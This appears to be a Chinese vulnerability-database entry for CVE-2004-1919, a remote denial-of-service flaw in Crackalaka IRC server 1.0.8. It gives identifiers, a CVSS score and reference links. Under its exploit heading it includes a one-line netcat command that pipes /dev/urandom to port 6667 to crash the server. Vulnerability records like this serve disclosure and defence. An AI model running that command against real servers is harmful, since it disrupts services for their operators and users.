Crackalaka IRC服务器远程服务拒绝漏洞

68次阅读
没有评论

Crackalaka IRC服务器远程服务拒绝漏洞

漏洞ID 1107862 漏洞类型 其他
发布时间 2004-04-09 更新时间 2005-10-20
Crackalaka IRC服务器远程服务拒绝漏洞CVE编号 CVE-2004-1919
Crackalaka IRC服务器远程服务拒绝漏洞CNNVD-ID CNNVD-200404-007
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23943
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-007
|漏洞详情
Crackalaka1.0.8版本的hasch.c中hash_strcmp函数存在漏洞。远程攻击者借助超大的畸形字符串导致服务拒绝(崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/10092/info

It has been reported that Crackalaka may be prone to a remote denial of service vulnerability that may allow an attacker to crash the server by sending an excessive amount of data.

Crackalaka version 1.0.8 is reported to be prone to this issue, however, other versions could be vulnerable as well. 

nc [host] 6667 < /dev/urandom
|参考资料

来源:XF
名称:crackalaka-hashstrcmp-dos(15824)
链接:http://xforce.iss.net/xforce/xfdb/15824
来源:BID
名称:10092
链接:http://www.securityfocus.com/bid/10092
来源:SECUNIA
名称:11340
链接:http://secunia.com/advisories/11340
来源:BUGTRAQ
名称:20040409DoSinCrackalaka1.0.8
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108152479316967&w;=2

相关推荐: AIX setsenv Buffer Overflow Vulnerability

AIX setsenv Buffer Overflow Vulnerability 漏洞ID 1103635 漏洞类型 Boundary Condition Error 发布时间 2000-12-01 更新时间 2000-12-01 CVE编号 N/A CNN…

正文完
 0